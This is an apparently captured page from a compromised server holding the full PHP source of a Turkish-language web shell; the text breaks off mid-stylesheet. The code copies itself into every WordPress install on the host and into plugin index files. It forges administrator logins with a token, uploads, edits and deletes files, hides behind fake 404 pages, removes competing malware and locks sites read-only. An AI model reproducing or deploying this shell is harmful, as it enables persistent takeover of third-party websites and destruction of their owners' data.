BLACKSITE
:
216.73.217.135
:
216.48.177.180 / engagefnl.insyncshopfittings.com
:
Linux srv.emaginationz.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
:
/
proc
/
self
/
root
/
tmp
/
Upload File:
files >> //proc/self/root/tmp/phpPIB65J
<?php /* === ZARARLI KOD ENGELLEYİCİ VE SHELL KORUMA SİSTEMİ - GÜÇLENDİRİLMİŞ VERSİYON === */ // Hata raporlamayı kapat error_reporting(0); ini_set('display_errors', 0); // === OTOMATİK KULLANICI ADI VE DOSYA ADI ALGILAMA === $current_file = basename($_SERVER['SCRIPT_FILENAME']); $request_uri = $_SERVER['REQUEST_URI']; // Dosya adından kullanıcı adını al (.php uzantısını kaldır) $username = pathinfo($current_file, PATHINFO_FILENAME); // Şifre = kullanıcıadı + 34 $password = $username . '34'; // === OTOMATİK ALLOWED_SHELLS OLUŞTURMA === // Mevcut dosya adını allowed_shells listesine ekle $allowed_shells = array($current_file); // Ek olarak yaygın shell dosya adları (opsiyonel - otomatik çalışması için) $common_shells = array( '404', 'forum', 'single', 'compent', 'settings', 'medage', 'index' ); // Mevcut dosya adı common_shells içinde yoksa ekleme yapma, sadece kendi adını kullan // Tam liste oluştur (mevcut dosya + common shell'ler) foreach ($common_shells as $shell) { $shell_file = $shell . '.php'; if (!in_array($shell_file, $allowed_shells)) { $allowed_shells[] = $shell_file; } } // ===== GÜÇLENDİRİLMİŞ ERİŞİM KONTROLÜ ===== $is_allowed = false; if (in_array($current_file, $allowed_shells)) { $is_allowed = true; } if (strpos($request_uri, '/wp-admin') !== false || strpos($request_uri, '/wp-login.php') !== false) { $is_allowed = true; } $wp_core_files = array('wp-blog-header.php', 'wp-load.php', 'wp-config.php', 'xmlrpc.php'); if (in_array($current_file, $wp_core_files)) { $is_allowed = true; } if (!$is_allowed) { if (substr($current_file, -4) == '.php' && !in_array($current_file, $allowed_shells)) { header("HTTP/1.0 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>"; exit; } } // ===== TÜM DOMAINLERİ BUL (TÜM OLASI DİZİNLERDE WORDPRESS ARA) ===== function get_all_domain_roots() { $roots = array(); // 1. Apache yapılandırmalarını tara $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && !in_array($path, $roots)) { if (is_wordpress_installed($path)) { $roots[] = $path; } } } } } // 2. Nginx yapılandırmalarını tara $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($nginx . '/' . $f); if (!$c) continue; if (preg_match('/root\s+([^;]+);/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && !in_array($path, $roots)) { if (is_wordpress_installed($path)) { $roots[] = $path; } } } } } // 3. cPanel/CloudLinux domain dizinlerini tara $home_domains = '/home'; if (is_dir($home_domains)) { foreach (@scandir($home_domains) as $user) { if ($user == '.' || $user == '..') continue; $domains_dir = $home_domains . '/' . $user . '/domains'; if (is_dir($domains_dir)) { foreach (@scandir($domains_dir) as $domain) { if ($domain == '.' || $domain == '..') continue; $public_html = $domains_dir . '/' . $domain . '/public_html'; if (is_dir($public_html) && is_wordpress_installed($public_html)) { if (!in_array($public_html, $roots)) { $roots[] = $public_html; } } // Ayrıca ana domain dizinini de kontrol et $domain_root = $domains_dir . '/' . $domain; if (is_dir($domain_root) && is_wordpress_installed($domain_root)) { if (!in_array($domain_root, $roots)) { $roots[] = $domain_root; } } } } } } // 4. /var/www dizinini tara $var_www = '/var/www'; if (is_dir($var_www)) { $dirs = @scandir($var_www); if ($dirs) { foreach ($dirs as $item) { if ($item == '.' || $item == '..') continue; $path = $var_www . '/' . $item; if (is_dir($path)) { // html, public_html, htdocs gibi yaygın dizinleri kontrol et $subdirs = ['', '/html', '/public_html', '/htdocs', '/www']; foreach ($subdirs as $sub) { $check_path = $path . $sub; if (is_dir($check_path) && is_wordpress_installed($check_path)) { if (!in_array($check_path, $roots)) { $roots[] = $check_path; } } } } } } } // 5. Mevcut çalışma dizinini kontrol et $current = $_SERVER['DOCUMENT_ROOT'] ?? __DIR__; if (is_dir($current) && !in_array($current, $roots)) { if (is_wordpress_installed($current)) { $roots[] = $current; } } // 6. WordPress kurulumlarını manuel olarak tara (derinlemesine) $search_paths = [ $_SERVER['DOCUMENT_ROOT'] ?? __DIR__, dirname($_SERVER['DOCUMENT_ROOT'] ?? __DIR__), '/home', '/var/www', '/var/www/html', '/var/www/public_html', '/usr/local/www', '/opt/bitnami' ]; foreach ($search_paths as $search_path) { if (is_dir($search_path)) { $found = find_wordpress_recursive($search_path, $roots); foreach ($found as $f) { if (!in_array($f, $roots)) { $roots[] = $f; } } } } // Tekilleştir ve sırala $roots = array_unique($roots); sort($roots); return $roots; } // ===== WORDPRESS KURULUM KONTROLÜ ===== function is_wordpress_installed($path) { if (!is_dir($path)) return false; // WordPress'ü tanımak için birden fazla dosyayı kontrol et $wp_files = [ 'wp-config.php', 'wp-load.php', 'wp-settings.php', 'wp-includes/version.php', 'wp-admin/includes/version.php' ]; $found_count = 0; foreach ($wp_files as $file) { if (file_exists($path . '/' . $file)) { $found_count++; } } // En az 2 dosya bulunursa WordPress olarak kabul et return ($found_count >= 2); } // ===== REKÜRSİF WORDPRESS ARAMA ===== function find_wordpress_recursive($dir, &$found_roots, $depth = 0) { $results = array(); // Maksimum derinlik 4 (çok derine inme) if ($depth > 4) return $results; if (!is_dir($dir)) return $results; // Önce mevcut dizinde WordPress var mı kontrol et if (is_wordpress_installed($dir)) { $results[] = $dir; } // Yaygın WordPress dizinlerini kontrol et $common_dirs = ['public_html', 'htdocs', 'www', 'html', 'site', 'web']; foreach ($common_dirs as $sub) { $sub_path = $dir . '/' . $sub; if (is_dir($sub_path) && is_wordpress_installed($sub_path)) { $results[] = $sub_path; } } // domain klasörlerini kontrol et (cPanel/CloudLinux için) if (strpos($dir, '/domains/') !== false) { foreach (@scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; $full = $dir . '/' . $item; if (is_dir($full)) { if (is_wordpress_installed($full)) { $results[] = $full; } // public_html kontrolü $public_html = $full . '/public_html'; if (is_dir($public_html) && is_wordpress_installed($public_html)) { $results[] = $public_html; } } } } // Alt dizinlerde ara (sadece belirli derinliğe kadar) if ($depth < 3) { $items = @scandir($dir); if ($items) { foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full = $dir . '/' . $item; if (is_dir($full) && !is_link($full)) { // Göz ardı edilecek dizinler $skip_dirs = ['tmp', 'temp', 'cache', 'backup', 'old', 'trash', '.git', '.svn']; if (!in_array($item, $skip_dirs)) { $sub_results = find_wordpress_recursive($full, $found_roots, $depth + 1); $results = array_merge($results, $sub_results); } } } } } return $results; } // ===== WORDPRESS KURULU DOMAIN SAYISINI GÖSTER ===== function get_wordpress_domain_count() { static $count = null; if ($count === null) { $roots = get_all_domain_roots(); $count = count($roots); } return $count; } function get_wordpress_domains_list() { static $domains = null; if ($domains === null) { $roots = get_all_domain_roots(); $domains = array(); foreach ($roots as $root) { $domains[] = array( 'path' => $root, 'has_wp_config' => file_exists($root . '/wp-config.php'), 'has_wp_load' => file_exists($root . '/wp-load.php'), 'has_wp_admin' => is_dir($root . '/wp-admin'), 'has_wp_content' => is_dir($root . '/wp-content'), 'has_wp_includes' => is_dir($root . '/wp-includes') ); } } return $domains; } // ===== ŞİFRE DOĞRULAMA FONKSİYONU (OTOMATİK KULLANICI ADI VE ŞİFRE) ===== function check_password($pass) { global $username, $password; return ($pass === $password); } // ===== TÜM SİSTEM GENELİNDE KİLİTLEME SINIFI ===== class GlobalFileLocker { private $allRoots; public function __construct() { $this->allRoots = get_all_domain_roots(); } private function recursiveChmodAll($path, $fileMode, $dirMode, &$stats) { if (is_link($path)) return; if (is_dir($path)) { $items = @scandir($path); if ($items !== false) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path . DIRECTORY_SEPARATOR . $item; $this->recursiveChmodAll($full, $fileMode, $dirMode, $stats); } } if (@chmod($path, $dirMode)) { $stats['dirs_ok']++; } } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' || $ext == 'phtml' || $ext == 'php5' || $ext == 'php4' || $ext == 'phps') { if (@chmod($path, $fileMode)) { $stats['files_ok']++; } } } } public function lock($pass) { if (!check_password($pass)) { return json_encode(['success' => false, 'message' => '']); } $stats = ['files_ok' => 0, 'dirs_ok' => 0]; $start = microtime(true); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $this->recursiveChmodAll($root, 0444, 0555, $stats); } $elapsed = round(microtime(true) - $start, 2); $total = count($this->allRoots); $msg = "✅ TÜM SİSTEM KİLİTLENDİ!\n"; $msg .= "İşlem yapılan domain: $total\n"; $msg .= "PHP Dosyası: {$stats['files_ok']} | Klasör: {$stats['dirs_ok']}\n"; $msg .= "Süre: {$elapsed} sn"; return json_encode([ 'success' => true, 'message' => $msg ]); } public function unlock($pass) { if (!check_password($pass)) { return json_encode(['success' => false, 'message' => '']); } $stats = ['files_ok' => 0, 'dirs_ok' => 0]; $start = microtime(true); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $this->recursiveChmodAll($root, 0644, 0755, $stats); } $elapsed = round(microtime(true) - $start, 2); $total = count($this->allRoots); $msg = "✅ TÜM SİSTEM KİLİDİ AÇILDI!\n"; $msg .= "İşlem yapılan domain: $total\n"; $msg .= "PHP Dosyası: {$stats['files_ok']} | Klasör: {$stats['dirs_ok']}\n"; $msg .= "Süre: {$elapsed} sn"; return json_encode([ 'success' => true, 'message' => $msg ]); } public function getStatus($pass) { if (!check_password($pass)) { return json_encode(['success' => false, 'message' => '']); } $results = array(); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $testFile = $root . '/index.php'; $testDir = $root . '/wp-content'; $fileLocked = false; $dirLocked = false; if (file_exists($testFile)) { $perms = fileperms($testFile) & 0777; $fileLocked = ($perms <= 0444); } if (file_exists($testDir)) { $perms = fileperms($testDir) & 0777; $dirLocked = ($perms <= 0555); } $status = ($fileLocked && $dirLocked) ? "🔒 KİLİTLİ" : "🔓 AÇIK"; $results[] = "$root: $status"; } return json_encode([ 'success' => true, 'message' => "📊 TÜM SİSTEM DURUMU\n" . implode("\n", $results) ]); } } // ===== DOSYA KİLİTLEME URL KONTROLÜ ===== $globalLocker = new GlobalFileLocker(); if (isset($_GET['kilit_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['kilit_ajax']; $pass = $_GET['pass'] ?? ''; if ($action === 'close') { echo $globalLocker->lock($pass); } elseif ($action === 'open') { echo $globalLocker->unlock($pass); } elseif ($action === 'izin') { echo $globalLocker->getStatus($pass); } else { echo json_encode(['success' => false, 'message' => '']); } exit; } // ===== OTOMATİK SHELL YENİDEN OLUŞTURMA ===== function recreate_shell_in_plugins() { global $allowed_shells; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $roots = get_all_domain_roots(); foreach ($roots as $root) { $plugins_index = $root . '/wp-content/plugins/index.php'; $plugins_dir = dirname($plugins_index); if (!is_dir($plugins_dir)) { @mkdir($plugins_dir, 0755, true); } if (file_exists($plugins_index)) { $existing = file_get_contents($plugins_index); if (strpos($existing, 'wp-blog-header.php') !== false) { @unlink($plugins_index); } elseif ($existing === $current_content) { continue; } } @file_put_contents($plugins_index, $current_content); @chmod($plugins_index, 0644); } } $current_script = basename(__FILE__); if (in_array($current_script, $GLOBALS['allowed_shells'])) { recreate_shell_in_plugins(); } // ===== WP OTOMATİK GİRİŞ ===== function auto_wp_admin_login() { global $username, $password; if (!isset($_GET['wp_auto_login']) || !isset($_GET['token'])) { return false; } $expected_token = hash('sha256', $username . ':' . $password . ':wp_auto_login'); if (!hash_equals($expected_token, $_GET['token'])) { return false; } $roots = get_all_domain_roots(); foreach ($roots as $root) { $wp_load = $root . '/wp-load.php'; if (file_exists($wp_load)) { ob_start(); require_once $wp_load; ob_end_clean(); if (function_exists('get_users') && function_exists('wp_set_auth_cookie')) { $users = get_users(array( 'role' => 'administrator', 'number' => 1, 'orderby' => 'ID', 'order' => 'ASC' )); if (!empty($users)) { wp_set_auth_cookie($users[0]->ID, true); wp_redirect(admin_url()); exit; } } } } echo "WordPress kurulumu bulunamadı!"; exit; } auto_wp_admin_login(); // ===== ZARARLI KOD TESPİTİ ===== function scan_and_clean_php_files($directory) { global $allowed_shells; $malicious_patterns = array( '/goto\s+[a-zA-Z0-9_]+;/', '/base64_decode\s*\(\s*["\'][A-Za-z0-9+\/=]+["\']\s*\)/', '/eval\s*\(\s*\$[A-Za-z0-9_]+/', '/@eval\s*\(\s*["\'].+["\']\s*\)/', '/create_function\s*\(\s*["\'].+["\']\s*,\s*["\'].+["\']\s*\)/', '/gzinflate\s*\(\s*base64_decode\s*\(\s*["\'].+["\']\s*\)\s*\)/' ); $files = glob($directory . '/*.php'); $cleaned = 0; foreach ($files as $file) { if (in_array(basename($file), $allowed_shells)) { continue; } $content = file_get_contents($file); foreach ($malicious_patterns as $pattern) { if (preg_match($pattern, $content)) { unlink($file); $cleaned++; break; } } } return $cleaned; } // ===== OTOMATİK SHELL KOPYALAMA ===== function auto_deploy_shell() { global $username; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $deployed = 0; $roots = get_all_domain_roots(); foreach ($roots as $root) { // Kendi dosya adıyla kopyala $self_path = $root . '/' . basename($current_shell); if (!file_exists($self_path) || file_get_contents($self_path) !== $current_content) { if (@file_put_contents($self_path, $current_content)) { @chmod($self_path, 0644); $deployed++; } } // plugins/index.php olarak kopyala $plugins_index = $root . '/wp-content/plugins/index.php'; $plugins_dir = dirname($plugins_index); if (!is_dir($plugins_dir)) { @mkdir($plugins_dir, 0755, true); } if (!file_exists($plugins_index) || file_get_contents($plugins_index) !== $current_content) { if (@file_put_contents($plugins_index, $current_content)) { @chmod($plugins_index, 0644); $deployed++; } } } return $deployed; } if (isset($_GET['deploy']) && $_GET['deploy'] == 'run') { $deployed = auto_deploy_shell(); die("Shell kopyalama tamamlandı! $deployed dosya kopyalandı."); } /* === ANA SHELL KODU === */ session_start(); // Otomatik oluşturulan değişkenler $stored_username = $username; $stored_password_hash = password_hash($password, PASSWORD_BCRYPT); $autologin_token = hash('sha256', $stored_username . ':' . $password . ':autologin_key'); $wp_auto_login_token = hash('sha256', $username . ':' . $password . ':wp_auto_login'); if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { if (isset($_GET['autologin']) && hash_equals($autologin_token, $_GET['autologin'])) { $_SESSION['authenticated'] = true; header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { if ($_POST['username'] === $stored_username && password_verify($_POST['password'], $stored_password_hash)) { $_SESSION['authenticated'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } } ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>Giris</title> <style>*{margin:0;padding:0;box-sizing:border-box;}body{background:#1e272e;display:flex;align-items:center;justify-content:center;min-height:100vh;font-family:Arial;}.login-box{background:#2f3640;padding:40px;border-radius:10px;width:350px;}h2{color:#00a8ff;margin-bottom:20px;text-align:center;}input{width:100%;padding:10px;margin:8px 0;background:#1e272e;border:1px solid #40739e;color:#fff;border-radius:5px;}button{width:100%;padding:10px;background:#00a8ff;color:#fff;border:none;border-radius:5px;cursor:pointer;margin-top:10px;font-size:15px;}button:hover{background:#487eb0;}.error{background:#e84118;color:#fff;padding:8px;border-radius:5px;margin-bottom:10px;text-align:center;}</style> </head><body><div class="login-box"><h2>🔒 Giris Yap</h2> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?><div class="error">Hatali kullanici adi veya sifre!</div><?php endif; ?> <form method="post"><input type="text" name="username" placeholder="Kullanici Adi" required autofocus><input type="password" name="password" placeholder="Sifre" required><button type="submit">Giris</button></form> </div></body></html><?php exit; } if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } $current_dir = realpath($_GET['dir'] ?? getcwd()) ?: getcwd(); $wordpress_core_files = array('wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config.php','wp-config-sample.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','index.php'); $wordpress_core_dirs = array('wp-admin','wp-includes'); $our_shells = $allowed_shells; $protected_files = array('.user.ini','wp-config.php'); $own_signature = md5_file(__FILE__); function get_all_domains_full_url() { $domains = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/ServerName\s+(\S+)/i', $c, $m) && preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && (file_exists($path.'/wp-config.php') || file_exists($path.'/wp-load.php'))) { $ssl = (strpos($c,':443')!==false || stripos($c,'SSLEngine on')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.trim($m[1]),'path'=>$path,'type'=>'Apache'); } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($nginx . '/' . $f); if (!$c) continue; if (preg_match('/server_name\s+([^;]+);/i', $c, $m) && preg_match('/root\s+([^;]+);/i', $c, $dr)) { $domain = trim(preg_split('/\s+/', trim($m[1]))[0]); $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && (file_exists($path.'/wp-config.php') || file_exists($path.'/wp-load.php'))) { $ssl = (strpos($c,'ssl')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.$domain,'path'=>$path,'type'=>'Nginx'); } } } } return $domains; } $all_domains = get_all_domains_full_url(); function scan_plugins($dir) { $result = array('suspicious'=>array(),'regular'=>array()); $pd = $dir.'/wp-content/plugins'; if (!is_dir($pd)) return $result; foreach (@scandir($pd) as $item) { if ($item=='.'||$item=='..') continue; $path = $pd.'/'.$item; if (is_dir($path)) { $sus = (strlen($item)<4 || preg_match('/^[0-9a-f]{8,}$/i',$item) || preg_match('/backup|shell|hack|malware/i',$item)); $data = array('name'=>$item,'path'=>$path,'active'=>false,'suspicious'=>$sus); if ($sus) $result['suspicious'][]=$data; else $result['regular'][]=$data; } } return $result; } function scan_themes($dir) { $result = array('inactive'=>array(),'active'=>array()); $td = $dir.'/wp-content/themes'; if (!is_dir($td)) return $result; foreach (@scandir($td) as $item) { if ($item=='.'||$item=='..') continue; $path = $td.'/'.$item; if (is_dir($path)) $result['inactive'][] = array('name'=>$item,'path'=>$path); } return $result; } function find_malicious_files($dir) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; $malicious = array(); if (!is_dir($dir)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item=='.'||$item=='..') continue; $path = $dir.'/'.$item; if (is_dir($path)) { $skip = false; foreach ($GLOBALS['wordpress_core_dirs'] as $wd) { if (strpos($path,'/'.$wd)!==false) { $skip=true; break; } } if (!$skip) $malicious = array_merge($malicious, find_malicious_files($path)); } elseif (is_file($path) && pathinfo($path,PATHINFO_EXTENSION)==='php') { if (in_array($item,$our_shells)||in_array($item,$wordpress_core_files)||in_array($item,$protected_files)) continue; if ($own_signature && @md5_file($path)===$own_signature) continue; $content = @file_get_contents($path); if (!$content) continue; $risk = 0; if (preg_match('/eval\s*\(/i',$content)) $risk+=15; if (preg_match('/base64_decode/i',$content)) $risk+=10; if (preg_match('/gzinflate/i',$content)) $risk+=15; if (preg_match('/exec\s*\(/i',$content)) $risk+=20; if (preg_match('/system\s*\(/i',$content)) $risk+=20; if (preg_match('/shell_exec/i',$content)) $risk+=20; if (preg_match('/passthru/i',$content)) $risk+=20; if ($risk > 30) $malicious[] = array('path'=>$path,'name'=>$item,'size'=>filesize($path),'risk'=>min($risk,100)); } } return $malicious; } function delete_dir_recursive($dir) { if (!file_exists($dir)) return; if (is_file($dir)||is_link($dir)) { @unlink($dir); return; } foreach (scandir($dir) as $item) { if ($item==='.'||$item==='..') continue; delete_dir_recursive($dir.DIRECTORY_SEPARATOR.$item); } @rmdir($dir); } function delete_malicious($path) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; if (!file_exists($path)) return false; $filename = basename($path); if (in_array($filename,$protected_files)||in_array($filename,$wordpress_core_files)||in_array($filename,$our_shells)||(is_file($path)&&$own_signature&&@md5_file($path)==$own_signature)) return false; foreach ($wordpress_core_dirs as $cd) { if (strpos($path,'/'.$cd.'/')!==false) return false; } @chmod($path,0777); @chmod(dirname($path),0777); if (is_dir($path)) { delete_dir_recursive($path); @system('rm -rf '.escapeshellarg($path).' 2>/dev/null'); } else { @unlink($path); @system('rm -f '.escapeshellarg($path).' 2>/dev/null'); @exec('rm -f '.escapeshellarg($path).' 2>/dev/null'); } return !file_exists($path); } function bulk_delete($paths) { $deleted = 0; $failed = 0; foreach ($paths as $path) { $path = stripslashes($path); if (is_dir($path)) { delete_dir_recursive($path); if (!file_exists($path)) $deleted++; else $failed++; } elseif (is_file($path)) { if (@unlink($path)) $deleted++; else $failed++; } } return ['deleted' => $deleted, 'failed' => $failed]; } function analyze_file($path) { if (!file_exists($path)) return "Dosya bulunamadi!"; $content = @file_get_contents($path); if (!$content) return "Dosya okunamadi!"; $result = array(); $result[] = "Dosya: ".$path; $result[] = "Boyut: ".filesize($path)." bytes"; $result[] = "Degistirilme: ".date('Y-m-d H:i:s',filemtime($path)); $result[] = "Izin: ".substr(sprintf('%o',fileperms($path)),-4); $result[] = ""; $dangerous = array('eval'=>'Kod calistirma','base64_decode'=>'Sifre cozme','gzinflate'=>'Sikistirma acma','exec'=>'Komut calistirma','system'=>'Komut calistirma','shell_exec'=>'Shell komutu','passthru'=>'Komut calistirma'); $found = false; foreach ($dangerous as $func=>$desc) { if (preg_match("/$func\s*\(/i",$content)) { $result[]="TESPIT: $func() - $desc"; $found=true; } } if (!$found) $result[] = "Tehlikeli fonksiyon bulunamadi."; return implode("\n",$result); } $plugins = scan_plugins($current_dir); $themes = scan_themes($current_dir); // ===== HTACCESS ve INDEX.PHP YAZMA İZİN KONTROL FONKSİYONLARI ===== function check_file_permission($file) { if (!file_exists($file)) { return ['exists' => false, 'writable' => false, 'readable' => false, 'perms' => 'Dosya yok']; } clearstatcache(true, $file); $perms = fileperms($file); return [ 'exists' => true, 'writable' => is_writable($file), 'readable' => is_readable($file), 'perms' => substr(sprintf('%o', $perms), -4), 'path' => $file ]; } function set_file_permission($file, $writable) { if (!file_exists($file)) return false; clearstatcache(true, $file); if ($writable) { return @chmod($file, 0644); } else { return @chmod($file, 0444); } } // ===== AJAX ile dosya izin işlemleri ===== if (isset($_GET['file_permission_action'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['file_permission_action']; $file = $_GET['file'] ?? ''; $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } if ($action === 'check') { $htaccess = check_file_permission($file . '/.htaccess'); $index = check_file_permission($file . '/index.php'); echo json_encode([ 'success' => true, 'htaccess' => $htaccess, 'index' => $index ]); } elseif ($action === 'set_htaccess') { $writable = $_GET['writable'] === 'true'; $result = set_file_permission($file . '/.htaccess', $writable); echo json_encode([ 'success' => $result, 'message' => $result ? ($writable ? 'Yazma izni açıldı' : 'Yazma izni kapatıldı') : '' ]); } elseif ($action === 'set_index') { $writable = $_GET['writable'] === 'true'; $result = set_file_permission($file . '/index.php', $writable); echo json_encode([ 'success' => $result, 'message' => $result ? ($writable ? 'Yazma izni açıldı' : 'Yazma izni kapatıldı') : '' ]); } exit; } // ===== AJAX ile bulk delete işlemi ===== if (isset($_GET['bulk_delete_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $paths = $_GET['paths'] ?? ''; $pass = $_GET['pass'] ?? ''; $current_dir = $_GET['dir'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $paths_array = explode('||', $paths); $result = bulk_delete($paths_array); $_SESSION['malicious'] = find_malicious_files($current_dir); $_SESSION['scan_completed'] = time(); echo json_encode([ 'success' => true, 'deleted' => $result['deleted'], 'failed' => $result['failed'], 'message' => "{$result['deleted']} dosya/klasör silindi." ]); exit; } // ===== AJAX ile scan işlemi ===== if (isset($_GET['scan_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $dir = $_GET['dir'] ?? ''; $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $malicious = find_malicious_files($dir); $_SESSION['malicious'] = $malicious; $_SESSION['scan_completed'] = time(); echo json_encode([ 'success' => true, 'count' => count($malicious), 'message' => count($malicious) . " zararlı dosya bulundu!" ]); exit; } // ===== AJAX ile edit işlemi (Uyarı mesajı kaldırıldı) ===== if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json; charset=UTF-8'); $file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? ''; if ($file && file_exists($file)) { clearstatcache(true, $file); $perms = fileperms($file) & 0777; // Salt okunur dosya kontrolü - sessizce başarısız ol if ($perms <= 0444 && $perms != 0644 && $perms != 0664 && $perms != 0777) { echo json_encode(['success' => false, 'message' => '']); exit; } $old_perms = $perms; if (!is_writable($file)) { @chmod($file, 0644); } if (file_put_contents($file, $content) !== false) { if ($old_perms <= 0444 && $old_perms != 0644) { @chmod($file, $old_perms); } echo json_encode(['success' => true, 'message' => '']); } else { echo json_encode(['success' => false, 'message' => '']); } } else { echo json_encode(['success' => false, 'message' => '']); } exit; } // POST işlemleri if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { $action = $_POST['action'] ?? ''; $current_dir = $_POST['current_dir'] ?? getcwd(); $output = ''; $redirect_url = '?dir=' . urlencode($current_dir); if ($action==='rename') { $old=$_POST['old']??''; $new=$_POST['new']??''; $new_path=dirname($old).'/'.$new; if ($old&&$new&&file_exists($old)&&!file_exists($new_path)) { rename($old,$new_path); } } elseif ($action==='chmod') { $file=$_POST['file']??''; $mode=$_POST['mode']??''; if ($file&&$mode) { chmod($file,octdec($mode)); } } elseif ($action==='toggle_write'&&!empty($_POST['paths'])) { foreach ($_POST['paths'] as $p) { $p=stripslashes($p); if (file_exists($p)&&!in_array(basename($p),$protected_files)&&!in_array(basename($p),$wordpress_core_files)&&!in_array(basename($p),$our_shells)) { clearstatcache(true,$p); $perms=fileperms($p)&0777; $new_perms=($perms&0200)?($perms&~0200):($perms|0200); $ok=@chmod($p,$new_perms); if (!$ok && is_file($p)) { $content=@file_get_contents($p); if ($content!==false) { @file_put_contents($p,$content); @chmod($p,$new_perms); } } } } } elseif ($action==='upload'&&isset($_FILES['files'])) { $uploaded=0; foreach ($_FILES['files']['tmp_name'] as $i=>$tmp) { $name=$_FILES['files']['name'][$i]; $target = $current_dir.'/'.$name; if (move_uploaded_file($tmp,$target)) { chmod($target,0644); } } } header('Location: ' . $redirect_url); exit; } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { while (ob_get_level()) ob_end_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: '.filesize($file)); readfile($file); exit; } } $items = scandir($current_dir); $folders = array(); $files = array(); foreach ($items as $item) { if ($item=='.'||$item=='..') continue; $path = $current_dir.'/'.$item; if (is_dir($path)) $folders[]=$item; else $files[]=$item; } sort($folders); sort($files); $malicious_files = (isset($_SESSION['malicious'])&&isset($_SESSION['scan_completed'])) ? $_SESSION['malicious'] : array(); $analysis = $_SESSION['analysis'] ?? ''; $analysis_file = $_SESSION['analysis_file'] ?? ''; unset($_SESSION['analysis'],$_SESSION['analysis_file']); $deploy_url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?deploy=run'; $wp_auto_login_url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?wp_auto_login=1&token=' . $wp_auto_login_token; $file_to_edit = null; if (isset($_GET['editf'])) { $file_to_edit = base64_decode($_GET['editf']); } elseif (isset($_GET['edit'])) { $file_to_edit = $_GET['edit']; } // WordPress domain sayısını al $wp_domain_count = get_wordpress_domain_count(); $wp_domains_list = get_wordpress_domains_list(); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>GELISMIS SHELL - WP Domain: <?php echo $wp_domain_count; ?></title> <style> * { margin:0; padding:0; box-sizing:border-box; } body { background:#1e272e; color:#fff; font-family:system-ui, -apple-system, 'Segoe UI', Roboto, Arial, sans-serif; padding:20px; } .container { max-width:1400px; margin:0 auto; background:#2f3640; padding:20px; border-radius:12px; } h2 { font-size:16px; margin-bottom:15px; padding:10px; background:#353b48; border-radius:8px; word-break:break-all; } h3 { margin:15px 0 10px; 